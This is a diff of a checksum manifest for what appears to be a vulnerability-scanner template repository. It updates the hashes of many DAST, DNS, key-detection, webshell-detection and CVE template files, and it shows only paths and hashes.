+dast/cves/2018/CVE-2018-19518.yaml:0d6eeac112afec77c0cd66694ee3209fbeb3b460 +dast/cves/2021/CVE-2021-45046.yaml:9098bcd20d5b9132e13f2e634d26a39571731932 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e -dast/cves/2022/CVE-2022-42889.yaml:bb874f7d9d81465ff8f033488f0d15398745d835 -dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml:2e91abdf5aa86b071f9f1ee1171304e8ab7d11cf -dast/vulnerabilities/cmdi/ruby-open-rce.yaml:533f3fcdc64ddbbea3ec34206f6848aefd72e36f -dast/vulnerabilities/crlf/cookie-injection.yaml:bd709f680e4bd96d9d7668d4b6df43f912c118ea -dast/vulnerabilities/crlf/crlf-injection.yaml:ecf67320feeb3516fa78977605c87cea950f26fe +dast/cves/2022/CVE-2022-42889.yaml:79536a14253675b31233e5b7d4e79ec6a7bce887 +dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml:a6cf83100df3e0ef6c1b65fdd383367e255db29b +dast/vulnerabilities/cmdi/ruby-open-rce.yaml:adfb5324a22b3ea5963127e56fb3fa92e7c12de7 +dast/vulnerabilities/crlf/cookie-injection.yaml:35c0cec9d407aae529b3f96b3f143db6c5cd8223 +dast/vulnerabilities/crlf/crlf-injection.yaml:612d455cb555c0d9bc01d5f0477d1f0fe7816e65 dast/vulnerabilities/csti/angular-client-side-template-injection.yaml:a76f2f0b28f4ec95a4d09add80ffff07e7a8f71d -dast/vulnerabilities/lfi/lfi-keyed.yaml:366e7b0c3bdef023427815022e64ed88b6e1d3d5 -dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml:71bfad9f7132086665db55b8c5aeeee3adf23d89 -dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml:f3663bb5ab092b4fc1e69998c2d92d64312dc57f -dast/vulnerabilities/redirect/open-redirect.yaml:3896789898155f3b800c7179806f6cdc6e750ee6 -dast/vulnerabilities/rfi/generic-rfi.yaml:ac4f9582d4d9b7930d28dbc0f21eede8df760507 -dast/vulnerabilities/sqli/sqli-error-based.yaml:ab3efe10b425fed28b569a88fd149d7e7ac706df -dast/vulnerabilities/ssrf/blind-ssrf.yaml:83027f4642aeaf84e49f09fc876ff91d6002f3af -dast/vulnerabilities/ssrf/response-ssrf.yaml:c72e6e9b48b79233c8781046a4695c235394fe10 -dast/vulnerabilities/ssti/reflection-ssti.yaml:f88426f514ecbe514a5b988b2e826d967bf80dbf +dast/vulnerabilities/lfi/lfi-keyed.yaml:15d9689d387442b530a740277764c5288d5bcf66 +dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml:d05ef53604c1b09350051bf8927fb17d588b17d4 +dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml:2681af5d5766eac8d9d94f71f6478936b6acac2d +dast/vulnerabilities/redirect/open-redirect.yaml:03d1e0ecfb57643c556ae97b9da6205e7cdf6075 +dast/vulnerabilities/rfi/generic-rfi.yaml:ccb7f6213b85d318ddccdc0ed035640cb0eca155 +dast/vulnerabilities/sqli/sqli-error-based.yaml:21fbab3668dc242a83af4b5654b67812fbee10c6 +dast/vulnerabilities/ssrf/blind-ssrf.yaml:b9fb10ee3cac909923cd69e66bcd00cc4711c766 +dast/vulnerabilities/ssrf/response-ssrf.yaml:87ed924c7dd70a88445f55a5e43e80103b9fa7ba +dast/vulnerabilities/ssti/reflection-ssti.yaml:bc1e6afaa6c2b1391163446b093245fe52475c52 dast/vulnerabilities/xss/dom-xss.yaml:397dd3f854c47a0aadd92ad3a9fc93aa77ec5253 -dast/vulnerabilities/xss/reflected-xss.yaml:1faff32e9ad4bb73f0476c526f9b6ef6d5a51757 -dast/vulnerabilities/xxe/generic-xxe.yaml:54b04c0c3b8d50d6305ed48ac7997f1aeeea426d +dast/vulnerabilities/xss/reflected-xss.yaml:d837fd6ed987c2af01f3c91f36c8aa46e3ce2e2b +dast/vulnerabilities/xxe/generic-xxe.yaml:18be2e50e0f2b956e69ce2ceacc4c7fd41547893 dns/azure-takeover-detection.yaml:5295c90a6fa66f513eca7f6f30eee8745a41aa0a -dns/bimi-detect.yaml:49b1f8b7289261ba3926483a41fa213f921248f2 +dns/bimi-detect.yaml:be88a91ed368a29c663e8d045770d696941ee923 dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24 dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2 dns/dmarc-detect.yaml:d60f87ac8a617c0496d558269abd50389bbb1b37 @@ -307,7 +307,7 @@ file/keys/confluent/confluent-access-token.yaml:22ef00e0d38ab3ff684399ecbc434ab0 file/keys/confluent/confluent-secret-token.yaml:5bf255f39a1dd565761bdd3faef2d40474b6e8d9 file/keys/contentful-api-token.yaml:be395d34eb41b023482cb411bbf552776687b238 file/keys/cratesio-api-key.yaml:78dd41536f3722d2334681d08d0e2332c317875a -file/keys/credential-exposure-file.yaml:d6be05c931599edd628a0591224a0c7ba56fa987 +file/keys/credential-exposure-file.yaml:7ca12c30144aba001cf357141b4fd0e9e89dc1d5 file/keys/credentials.yaml:7d9557524fa206e8bb91295da81890e44084838f file/keys/databricks-api-token.yaml:a9bfc986be3fff96341f96b4213700a370c852a4 file/keys/datadog-access-token.yaml:12b74598ee375f3a5ffbcd81ef8d526c9b852638 @@ -570,7 +570,7 @@ file/webshell/asp-webshell.yaml:3d5fd63aebe784dc4f49b04478b7fef5f4e9e2c2 file/webshell/jsp-webshell.yaml:2d750d74431e61570c7d96d5ffeb4353d3820a1d file/webshell/php-webshell.yaml:8465f2abe6a2b13a2f3ceaa3c277a7fdebdfaa41 file/xss/dom-invader-xss.yaml:9b911e2d4de98274f413c9a6a6689a4609c66eaa -headless/cves/2018/CVE-2018-25031.yaml:8b5faaa45f03891affc1bd2cee95861b36dc0ac4 +headless/cves/2018/CVE-2018-25031.yaml:0575e57be2ecb42413b4a1f94c936b7a8130ee8c headless/dvwa-headless-automatic-login.yaml:4c1f2437b541a83dfda0e1239995b08a0315e478 headless/extract-urls.yaml:499408f8b8d77cb5315ed584ac23c90328823a3f headless/headless-open-redirect.yaml:b18cf92bc09eff3df48ca7c7e4f0c6d4fef9b97c @@ -580,7 +580,7 @@ headless/prototype-pollution-check.yaml:e7e9713474a3f7376073cb23ae5f878973238f65 headless/screenshot.yaml:037205c1a1cb5617d119da0a545d1d6742629ef4 headless/technologies/js-libraries-detect.yaml:5c62ba8ad03afb53da2856ea757fe4fd20694567 headless/technologies/sap-spartacus.yaml:fd0c71b102c08d82bbc848c59b83b92634d13cc6 -headless/webpack-sourcemap.yaml:c23ffc4991461ced4e784fff2889519393bb1fd1 +headless/webpack-sourcemap.yaml:b87241133bd43542be006044425c0e54fd90ce42 headless/window-name-domxss.yaml:d56b00173f38f50a27940e5beeaa9499d6cd7c2c helpers/payloads/CVE-2018-25031.js:47b0062436e7afe62fc2f8251a29bb4d443327d2 helpers/payloads/CVE-2020-5776.csv:bb017fe08ae985c23145f7b69aab97cdffbbd8aa @@ -843,10 +843,10 @@ helpers/wordpress/plugins/wpvivid-backuprestore.txt:e0055b0fd1d2a73c3ef09516c32e helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875 helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:d2728a246c4129a45f2985f6e4f626f9bba678c6 http/cnvd/2017/CNVD-2017-03561.yaml:79260d0e646db6519b46802fac2d8ec8589d1ba2 -http/cnvd/2017/CNVD-2017-06001.yaml:5ac8e22a95722f256b2676eb6bb0dfff30ee70c9 +http/cnvd/2017/CNVD-2017-06001.yaml:ba89239706a52d6fb90ef5d2839a27998b094a67 http/cnvd/2018/CNVD-2018-13393.yaml:e365c4cc3cecc4451e7c34a6981ab065564b97cb http/cnvd/2019/CNVD-2019-01348.yaml:00039f3ad05b482affa479dab2872b59519edae9 -http/cnvd/2019/CNVD-2019-06255.yaml:177b4595e92f65baec0c9ab8a1aa5c544ef438e6 +http/cnvd/2019/CNVD-2019-06255.yaml:b5ac6795873114fa8e9a054e020d6d050127c153 http/cnvd/2019/CNVD-2019-19299.yaml:cd50ea5ec3feef05ce24f3cc0156675d3c9c975e http/cnvd/2019/CNVD-2019-32204.yaml:cebac2aca6a77c5ec79483cbdc162c22c158bd7e http/cnvd/2020/CNVD-2020-23735.yaml:ad6eb9158cab78f80ed0a048f4e63b56890d46fd @@ -897,67 +897,67 @@ http/credential-stuffing/self-hosted/gitlab-login-check-self-hosted.yaml:24e33df http/credential-stuffing/self-hosted/grafana-login-check.yaml:0b82037ff4e9c72df81aa93d7c7f5c745866c664 http/credential-stuffing/self-hosted/jira-login-check.yaml:968e46885f51c77a83c0698e59e96c37b37ea8b8 http/cves/2000/CVE-2000-0114.yaml:ebdf6c20a94e575096700e3a5a2bcb88c9995708 -http/cves/2001/CVE-2001-0537.yaml:e43dc67ef6870c9cffcb40b31631f7cd128b4e9f -http/cves/2002/CVE-2002-1131.yaml:be017258958ebe468f86e0f0d1a2500fd26ae77e +http/cves/2001/CVE-2001-0537.yaml:d382d674c6a41452f9875ae325f7a4bc521a3436 +http/cves/2002/CVE-2002-1131.yaml:93453aab0c68ec326bdcfb1a1386df77e0bf71a1 http/cves/2004/CVE-2004-0519.yaml:7968af9d55ad3d7db45d4978c04830f4b81a26ed http/cves/2004/CVE-2004-1965.yaml:1f20050eb605b78c6c0307155707e90d3c3a5cd5 -http/cves/2005/CVE-2005-2428.yaml:014d3a09f56e144c520b80336166df118252095d +http/cves/2005/CVE-2005-2428.yaml:e09462c8f4b106cff927fefab3ca9724b08ea278 http/cves/2005/CVE-2005-3344.yaml:54a7b30968e8eff300d74083651ac78ba54a6b61 -http/cves/2005/CVE-2005-3634.yaml:f64b8d12db340de3b554370d43c4ac36123ad73e +http/cves/2005/CVE-2005-3634.yaml:3adbddbf3e0a1a6611d9b5f6979024e5e563953a http/cves/2005/CVE-2005-4385.yaml:20057d0cba302dc1bad5953124947e0267033c89 http/cves/2006/CVE-2006-1681.yaml:3dab8b5c90252f5c915312e7ad02426c2d60f98f -http/cves/2006/CVE-2006-2842.yaml:7d75e13cd3030dbbb90b65d37f4958dc32d7945a +http/cves/2006/CVE-2006-2842.yaml:bacd02ccf706949bd716f4d2cd2f9c0799098c05 http/cves/2007/CVE-2007-0885.yaml:2bc9559f910da5a0f99cf4412fe56ab526bdb039 -http/cves/2007/CVE-2007-3010.yaml:54985bb083d5dc7ff5ee07783055c8b3e0fc4671 +http/cves/2007/CVE-2007-3010.yaml:a4e5d49eac9e1a434c99159ba3cb47fc57ba6c58 http/cves/2007/CVE-2007-4504.yaml:09f70f7c4bd05d9a2f38874308b2b97a0f22547b http/cves/2007/CVE-2007-4556.yaml:74d58c6684bd7085f1b675e0fdb910c9bf5f45c9 -http/cves/2007/CVE-2007-5728.yaml:5a78fc32243b74fcc77e3bb6d6949c9d93613ee8 +http/cves/2007/CVE-2007-5728.yaml:ee0142ec5433f1ddb20340ca06d7f0dbc939b76b http/cves/2008/CVE-2008-1059.yaml:a6e88a29e1382a7a92d2465b513ffd1223d870b9 -http/cves/2008/CVE-2008-1061.yaml:4c857ca420e45320722618ca7441c47710baac67 -http/cves/2008/CVE-2008-1547.yaml:aa5fbd3a9c8e154c2961e798b1e2a7e676b1b80b +http/cves/2008/CVE-2008-1061.yaml:e02a560cde228c062682c76b2a0226125341dd75 +http/cves/2008/CVE-2008-1547.yaml:d695808a224b08d70db7a79cc64479940964a67b http/cves/2008/CVE-2008-2398.yaml:f5c4cb5d6dafa0a882eae29c89bb6a3982ba69a4 http/cves/2008/CVE-2008-2650.yaml:855fa8c9bcca0355512690ec9869315ac1096d81 http/cves/2008/CVE-2008-4668.yaml:dd5527612e924d9a59ac3c58c998cacc8e70441c http/cves/2008/CVE-2008-4764.yaml:b61a8db01efa92c650b4605cabcf023653e9f153 -http/cves/2008/CVE-2008-5587.yaml:b8c1f9c0b62c60dc47344371249cdd346ab6fe33 +http/cves/2008/CVE-2008-5587.yaml:adea98e72c16a8b86d77173218168cf5a9c630ff http/cves/2008/CVE-2008-6080.yaml:4d19f123f5d5b550ed9a60f9115032044bd3e508 http/cves/2008/CVE-2008-6172.yaml:1b69d725cbe082350970da03b78cb1ab9616ae6f http/cves/2008/CVE-2008-6222.yaml:49c094908bc759b30d38a2239f3f7a6cad5d51cb -http/cves/2008/CVE-2008-6465.yaml:ee456b5fe4464d4f0ebf0caad6ffe86c64d02f75 +http/cves/2008/CVE-2008-6465.yaml:9ef92fb2b872321444c23d9630a2e7c15d0966e5 http/cves/2008/CVE-2008-6668.yaml:9a26a2081b16686c196e3d556cd05fe9a39373d9 -http/cves/2008/CVE-2008-6982.yaml:ec7e061e851cd73e256f6cc2b73658bf631d9bc2 -http/cves/2008/CVE-2008-7269.yaml:99d96962951649254ec5aa0c310c1123f8bdb4bb +http/cves/2008/CVE-2008-6982.yaml:eaed42c39192e5dc56c7751966339769d112ee3d +http/cves/2008/CVE-2008-7269.yaml:dbb30aaa7a79584c3f780968ce16dd3ff36b4e20 http/cves/2009/CVE-2009-0347.yaml:5ce90e313f49f7c658c8208dc28b030f6ad68263 http/cves/2009/CVE-2009-0545.yaml:c7f9ecbf2085e123b198011f3fd387506a9e8a71 http/cves/2009/CVE-2009-0932.yaml:6a85d3af6796f5e3dab7010769ac762444039fc1 -http/cves/2009/CVE-2009-1151.yaml:8dc096e55a97d8b7b97d856fa96e90726da5e66d -http/cves/2009/CVE-2009-1496.yaml:3b7fd77b1a4aa689f73d36ecdb6b3e5fa5ad4367 +http/cves/2009/CVE-2009-1151.yaml:276d47a84802d93255932840fa94c5dea0cdfb87 +http/cves/2009/CVE-2009-1496.yaml:04bc77742ef20946627f2a02abbb694f7658c5e2 http/cves/2009/CVE-2009-1558.yaml:7311f5b1b9a9fe041ce4ffbd34daf2e6fe0e7538 -http/cves/2009/CVE-2009-1872.yaml:8657a5749e8a88ae4ba56e5b0b19c3464a6ae7b2 +http/cves/2009/CVE-2009-1872.yaml:15f4428e5f8cdc36de49c9964025bcbc4bf7b5af http/cves/2009/CVE-2009-2015.yaml:4694ca53378e410392946e729b2526d1220db192 http/cves/2009/CVE-2009-2100.yaml:6bbdf6cca928b966076b4cddbd0668eef5331e0a http/cves/2009/CVE-2009-3053.yaml:68a597a8292c709a6f9490f4ff1fc4e75c1ef815 http/cves/2009/CVE-2009-3318.yaml:9ff69197adddbece5877c66bf06b8db0dc809919 -http/cves/2009/CVE-2009-4202.yaml:6bb8aa9ffd8f9764e6ed8c1a0558cde6ed7029a7 +http/cves/2009/CVE-2009-4202.yaml:8c8beab28cc42de1d26edc7fb12ee86ef136053c http/cves/2009/CVE-2009-4223.yaml:a58ac563ac596712f2eaec11206e976d07406757 http/cves/2009/CVE-2009-4679.yaml:6fc53e452071d62d54f1e77aeb36669cdab21df2 http/cves/2009/CVE-2009-5020.yaml:bd0ef8373deacb3918d2a779286f03003f4db49f -http/cves/2009/CVE-2009-5114.yaml:eed033fbf16521f4aba9fe6fddbef642c202a00b -http/cves/2010/CVE-2010-0157.yaml:950e30b71bb923174f57682b4022772c34d0cf03 -http/cves/2010/CVE-2010-0219.yaml:c02b48de176640720fb49210c96677b7dc75ab9c +http/cves/2009/CVE-2009-5114.yaml:c81e94c486c8b9856668062ef22f809e5210851c +http/cves/2010/CVE-2010-0157.yaml:194363720489c0c2768116201c5e0e974fefd086 +http/cves/2010/CVE-2010-0219.yaml:6d32fd9490a810661cecd70c1ef75f619c3d09e0 http/cves/2010/CVE-2010-0467.yaml:2a28c465b90430beaa770b63044d2bc00ca7bbc1 -http/cves/2010/CVE-2010-0696.yaml:73259ec73f220808622802ae226874d03de4a439 +http/cves/2010/CVE-2010-0696.yaml:b6d9989aba8e5757baa797341c3097a9fe77e78f http/cves/2010/CVE-2010-0759.yaml:30831ecff561e842b6f472ea7cbb1ba54b85fa69 http/cves/2010/CVE-2010-0942.yaml:f5cbdd272685133623fd425e6d33e0fb1733e3d4 http/cves/2010/CVE-2010-0943.yaml:d1fe9d2b4e08d5ea81e894c03d11b7bcbdb73bb3 -http/cves/2010/CVE-2010-0944.yaml:bfaf0faec2899ff4a64cb1a41b4229d73fbfd6a6 +http/cves/2010/CVE-2010-0944.yaml:201ffb5a798d6b84b5b3e420f4530ff0e756d515 http/cves/2010/CVE-2010-0972.yaml:e47087f278696e7b0e8904840e7d224727b6bf88 http/cves/2010/CVE-2010-0982.yaml:599bb1fb381fde5c20d5bcbcce1d55ba75512a52 -http/cves/2010/CVE-2010-0985.yaml:ea6f8ee446653031d0a1f2ee0295e337a7f115d8 +http/cves/2010/CVE-2010-0985.yaml:1628ee785dc09dda351edf113ab98e676386460b http/cves/2010/CVE-2010-1056.yaml:900582497ec305ba4fca6320cfc58b4975b3d751 http/cves/2010/CVE-2010-1081.yaml:d461a69be5c5267870cc70fad2dcca1339693f1c http/cves/2010/CVE-2010-1217.yaml:65a2add18d495fa4aee30dc5d70bb31a6fc9a437 -http/cves/2010/CVE-2010-1219.yaml:f22b61d9fdc94d2e0611638f8adc881eee8481a9 +http/cves/2010/CVE-2010-1219.yaml:2c428386556554acdb5a1e85f05ddec9fc0566f5 http/cves/2010/CVE-2010-1302.yaml:6ad059078eeb8d7f3bfd2aec5e71cdd7ae6f3891 http/cves/2010/CVE-2010-1304.yaml:727f1f1679c1f1973b09e11ad131f2cbb15e7dea http/cves/2010/CVE-2010-1305.yaml:67a2a340abb039bb80a8d0fdae26e297af4fefef @@ -966,37 +966,37 @@ http/cves/2010/CVE-2010-1307.yaml:e11765da3157952bceebc8445909ceee612f9279 http/cves/2010/CVE-2010-1308.yaml:7943dd6eab9e9df47150a03c293f9ebee95d49a8 http/cves/2010/CVE-2010-1312.yaml:9fd9f03506ee1c8d65629ad0f4dabd7d02ba961f http/cves/2010/CVE-2010-1313.yaml:15714bc34418e04e71c90da73b5ad0cde2f7fd86 -http/cves/2010/CVE-2010-1314.yaml:e68e08b08120bd8612c9376f8b4a8f4562aa76ee +http/cves/2010/CVE-2010-1314.yaml:e6bdf78dda7e3556a5d74ad003586c6cc1bbb551 http/cves/2010/CVE-2010-1315.yaml:8ae5fb46079488101b9c5e99a775d0f97dc98883 http/cves/2010/CVE-2010-1340.yaml:0c5648a4d0daa4d1915c4403fe656fa83bcc1ccd http/cves/2010/CVE-2010-1345.yaml:4e2d3d3329776cf5b14080ac31bee840bdd22646 -http/cves/2010/CVE-2010-1352.yaml:0f001c6956c9fc5d200417b838d6a39fc23e353d +http/cves/2010/CVE-2010-1352.yaml:f2a5d1ad8422b327905a7d7c8fec4d37f12439bd http/cves/2010/CVE-2010-1353.yaml:4481e610c4ae85c49bdb915f28cb73819042279e http/cves/2010/CVE-2010-1354.yaml:dfd813c316d91c3f5020de9ce109a13e0c2c545e -http/cves/2010/CVE-2010-1429.yaml:38150df0a318c623b9f957bd48eb79149cda4be7 +http/cves/2010/CVE-2010-1429.yaml:7df174485a45e36b5a28b30793102c970bea397a http/cves/2010/CVE-2010-1461.yaml:22ff8d954f8aefe76461ec1bb45a5afae27f419d http/cves/2010/CVE-2010-1469.yaml:184ebde7e35095d2bb953c855dc1ac36f1c45ab0 -http/cves/2010/CVE-2010-1470.yaml:425cbc7cf9331292bc877c74171918b9b26233ed +http/cves/2010/CVE-2010-1470.yaml:1352ee06c702107b5c350ff4d45635b7d6aec56d http/cves/2010/CVE-2010-1471.yaml:e9767437cfdb3112ee0af90b66a151b7ac488f72 http/cves/2010/CVE-2010-1472.yaml:05efa0d65dfd726f7800598f8a7d6f69bdf2ac28 http/cves/2010/CVE-2010-1473.yaml:1a884946a3b1c4d2f21358885422c76e1c546bb2 http/cves/2010/CVE-2010-1474.yaml:08e6e6d4a21096f7d84d3fcc7b50a77767577217 -http/cves/2010/CVE-2010-1475.yaml:ba1533465a3c2032e7bbe8babc2aa2e33279217a +http/cves/2010/CVE-2010-1475.yaml:9a0fc4be309eedbfa1bea078e195580d8315b0ad http/cves/2010/CVE-2010-1476.yaml:7890f7de322b9e0b96d7eb965cd4bdf8e7facc0e http/cves/2010/CVE-2010-1478.yaml:30788df9e30a86e49a95dbe857ba7d6f88895b35 http/cves/2010/CVE-2010-1491.yaml:81c825592c5b5b85645945be1cd9d88c4f88df9d http/cves/2010/CVE-2010-1494.yaml:8b520da8bf3985db0e217c289d806ce5fd9a2d50 http/cves/2010/CVE-2010-1495.yaml:fd08efd24fe096d136458eebabaf285744e07e0a -http/cves/2010/CVE-2010-1531.yaml:37431ef4763a68b3568e8a486d81cf5e1643d80a +http/cves/2010/CVE-2010-1531.yaml:8ed70984f10bab8e6159c0e715ccdecaf46ee606 http/cves/2010/CVE-2010-1532.yaml:81da2999d656843c4f582b4295651a7ef0ba7dd7 http/cves/2010/CVE-2010-1533.yaml:743b6a096195b8ea287119bfd574136648f1d711 http/cves/2010/CVE-2010-1534.yaml:e56bd300d4e208ef033a7a9c0d85c99c441890e3 http/cves/2010/CVE-2010-1535.yaml:5decf50fd0a035aebb67f4bbb938af0d6a7ca136 http/cves/2010/CVE-2010-1540.yaml:eaf66df28d06a8f26b2c99f262d92b1340a42b16 http/cves/2010/CVE-2010-1586.yaml:d58c94874f5a6501a136f572f673c8b805d8ae9b -http/cves/2010/CVE-2010-1601.yaml:b4aafeb36e3e33aeb3edd3b955b4953db25705ea +http/cves/2010/CVE-2010-1601.yaml:79949ba775daa7d9da8758347e80cf6524985fe0 http/cves/2010/CVE-2010-1602.yaml:0bf601a88a5f2213c172f4ff817e3bd2dc9e446d -http/cves/2010/CVE-2010-1603.yaml:b6188b9d88e5d2351979796ebb3270d3fde53be9 +http/cves/2010/CVE-2010-1603.yaml:bd4aad8ebb74e917c51fa68d1a8ccfe9f1f70a3b http/cves/2010/CVE-2010-1607.yaml:383a5834d2af2c9e953b6656a676cc5fb5bd86ca http/cves/2010/CVE-2010-1653.yaml:461aca038a9faf55b9e4ad7c5cb8b24523f13246 http/cves/2010/CVE-2010-1657.yaml:f3040ebeda1902bdd736bebc84c3134525692228 @@ -1006,12 +1006,12 @@ http/cves/2010/CVE-2010-1714.yaml:b9fc204e8b85ee36b0f15a8da385448b2dd2fbce http/cves/2010/CVE-2010-1715.yaml:53074615708c1c4f6bf5049cf5447affe828465b http/cves/2010/CVE-2010-1717.yaml:ccf1a65be89b0c388cc9f71c28d0d6b51a17b743 http/cves/2010/CVE-2010-1718.yaml:df1c72fc97a5e4c4301b15df30b2dd19957dbc63 -http/cves/2010/CVE-2010-1719.yaml:81f15e4304779eb24cba200b01099889e5140a74 +http/cves/2010/CVE-2010-1719.yaml:5302d813d018de90c429483be8031c6f9cbb8f49 http/cves/2010/CVE-2010-1722.yaml:75137a1adbb8ebcbb47642b983d93983a3f276c9 http/cves/2010/CVE-2010-1723.yaml:8b54bddf0e5f6757d1ce9cba44a93386e8ef4632 http/cves/2010/CVE-2010-1858.yaml:47fdeb1cfc6c33db3a6fbc3b6f841e5738c5524d -http/cves/2010/CVE-2010-1870.yaml:bb2835745b04eecff40eac1bcbd77c04e2412723 -http/cves/2010/CVE-2010-1875.yaml:153037344f618b22315b5cb6c764f56e6020e115 +http/cves/2010/CVE-2010-1870.yaml:43a78570d982c16804e4d194ba483ddaf9891a7d +http/cves/2010/CVE-2010-1875.yaml:fc212ea166e32d4b166bc9a26a6ad1843cf7a999 http/cves/2010/CVE-2010-1878.yaml:e376a84dae26f6d3b0cce191c22e273523736ed2 http/cves/2010/CVE-2010-1952.yaml:4c2889583512c97a6a66ec527acc778d77792240 http/cves/2010/CVE-2010-1953.yaml:e091d239b1ef9ceb20ba5d9338cbf5238491d9e6 @@ -1022,94 +1022,94 @@ http/cves/2010/CVE-2010-1957.yaml:cd4b276eb4b4fa3cbd962409f2a6d9e3d23cb8d6 http/cves/2010/CVE-2010-1977.yaml:45955fdad4bd60abfa0939a1f7ad6d64243f70d1 http/cves/2010/CVE-2010-1979.yaml:0ddddf83b9d40873443db4a31de2ebedbdc1a8bc http/cves/2010/CVE-2010-1980.yaml:d46da5ed40593b05c99310de3c3cf02b596f785c -http/cves/2010/CVE-2010-1981.yaml:b1c467846895e76100a2ce986bbd364c7ef11875 +http/cves/2010/CVE-2010-1981.yaml:f43b93dd94b21a778c95ce79f823d649ff3d0354 http/cves/2010/CVE-2010-1982.yaml:55fa02576aa3ae20a65183ca3186069fa806d6f8 http/cves/2010/CVE-2010-1983.yaml:d8d03db95a52020abedb493b3f4cd0050c166b3b http/cves/2010/CVE-2010-2033.yaml:6897fa1eb808a4ad1dd8f1980c3128050da1a9c6 http/cves/2010/CVE-2010-2034.yaml:ed205dcf43b360b3b9380b59380607610c6db446 -http/cves/2010/CVE-2010-2035.yaml:343a15271ba30a258277c2d62a2ac0b32eae4a7a +http/cves/2010/CVE-2010-2035.yaml:53e75e053b58c085708c1cdece73af273dc54f12 http/cves/2010/CVE-2010-2036.yaml:e15f376a2171fd2d2e55e99907cf7fe74244551c http/cves/2010/CVE-2010-2037.yaml:7bfb032acaab69c6117c5d8facda6543281db3d5 http/cves/2010/CVE-2010-2045.yaml:da2b1830c10d0a89cc941fe7c6b0eec0164efe12 http/cves/2010/CVE-2010-2050.yaml:2c65bfd5b4066f7e9ca8c0c4f38395a301d466c5 http/cves/2010/CVE-2010-2122.yaml:3e2a4991e90707a57e0770920aa0f55a12b5efc5 -http/cves/2010/CVE-2010-2128.yaml:7e08cbdba6e319549864dcd168316626d1fec1a5 +http/cves/2010/CVE-2010-2128.yaml:3af0b3e012bf01b46103d4f69399fcf324a901f0 http/cves/2010/CVE-2010-2259.yaml:7ee9cb7d015a35ae5db7d2b21dc21eee66b1335f -http/cves/2010/CVE-2010-2307.yaml:974a029d715d0b35c48ae0152129a4eb67bc72c5 +http/cves/2010/CVE-2010-2307.yaml:c5b4430091826a2b0e6134f1c917f39a0fc3956f http/cves/2010/CVE-2010-2507.yaml:a7d4c681213119f3c275846d077e817bef44d5e6 http/cves/2010/CVE-2010-2680.yaml:abbf84831ad4ea9ed18e4185380d214afbfbde14 http/cves/2010/CVE-2010-2682.yaml:55d668ece64b7ec7b966b2979e89092420f94fa2 -http/cves/2010/CVE-2010-2857.yaml:2e5ec92cf7a36d86f01ff057ec26939b1877a8d5 -http/cves/2010/CVE-2010-2861.yaml:0f5d97f78cc1f78be327bf9b67668b5146a04aa3 +http/cves/2010/CVE-2010-2857.yaml:88f7c6c2ed046efbf79a751eabf53cab0e9f4fcd +http/cves/2010/CVE-2010-2861.yaml:ef94f96f0c7193a0bf1d375b6cc65c2dad492146 http/cves/2010/CVE-2010-2918.yaml:fdd7c2962f11d92aefd3a974869c53ed44400ebf -http/cves/2010/CVE-2010-2920.yaml:f32fc44594b039fd382f339f9ac42d0d9858a60b +http/cves/2010/CVE-2010-2920.yaml:54fd476d18b55e355baeae19b8bd01387e2e4f42 http/cves/2010/CVE-2010-3203.yaml:000a8f0c4dcf829e67fe60c966debd95143f899f http/cves/2010/CVE-2010-3426.yaml:8fbd7d692e79dc4e64334f330432896ca80e1e8a http/cves/2010/CVE-2010-4231.yaml:95061e8a83ae97b5bc5f257526742084ee228267 http/cves/2010/CVE-2010-4239.yaml:70dfd38979f322a9c84edfc3f3439c7e6eaca447 http/cves/2010/CVE-2010-4282.yaml:eca8fb47c4f137ee769a8ce8170e5feea53475c0 http/cves/2010/CVE-2010-4617.yaml:890b0e647d804ad358fdfd64173d51fbbf168ef1 -http/cves/2010/CVE-2010-4719.yaml:6c0dc775334d3f436a198b83d84a98acf172da6a +http/cves/2010/CVE-2010-4719.yaml:0261ff6acbc01b1d4459620961b781b2cfb86aa8 http/cves/2010/CVE-2010-4769.yaml:d677d549a83a06d3a26b105a7f9d42161b491ca4 http/cves/2010/CVE-2010-4977.yaml:44aade6d6155014fe33a8ec57e7898212331104e http/cves/2010/CVE-2010-5028.yaml:c396646a343f1230675d7db4de16eaf675e26e7a http/cves/2010/CVE-2010-5278.yaml:4b551326a6f84dc58285d03101811b8ae002aba8 http/cves/2010/CVE-2010-5286.yaml:992dcc1f927e19df7e91041994ebba411d0c287b http/cves/2011/CVE-2011-0049.yaml:d4ae5f76935775886bf63bfac0a0ea93947e3a74 -http/cves/2011/CVE-2011-1669.yaml:b790ebc1bb9519722ffd34b342f8d4eca798ecb2 +http/cves/2011/CVE-2011-1669.yaml:122bfb098be229a5613cf020311eae4882979a6a http/cves/2011/CVE-2011-2744.yaml:e75a2a3b77597ee4b6eadb57cc5a878859099de0 http/cves/2011/CVE-2011-2780.yaml:cd61fcc85be0dd1ad856d5d42c1b0d8becf32ca5 http/cves/2011/CVE-2011-3315.yaml:a0377daef14d191981a0f569ca9c7d5816b34809 http/cves/2011/CVE-2011-4336.yaml:da0baea9d73290dee0d3ed225841560e1736a9a3 http/cves/2011/CVE-2011-4618.yaml:43b9dc16cda0cbffcc4ee7b6bfb7390ef291deae -http/cves/2011/CVE-2011-4624.yaml:67aec04578dce4d171c7e6a30f6101a4f35537d8 -http/cves/2011/CVE-2011-4640.yaml:92182b7d6ce6e598ba082f300a2d3fcb7a81c381 +http/cves/2011/CVE-2011-4624.yaml:3a32b317c39a2e459f72e7b824cfe9cc133278f5 +http/cves/2011/CVE-2011-4640.yaml:d8b12a71e4ea659c4c8395d3e80f7e68bf290899 http/cves/2011/CVE-2011-4804.yaml:5f7d69e922d525bcaed5e0f3363e99abb1742866 -http/cves/2011/CVE-2011-4926.yaml:4623078a9e2f41dcb7faab66c37f210c2ace9e21 +http/cves/2011/CVE-2011-4926.yaml:8ecd4fbf984647488c91ceebdda0c96f4f9dfd40 http/cves/2011/CVE-2011-5106.yaml:f411f9f73e789680f95b18aced081d080c822470 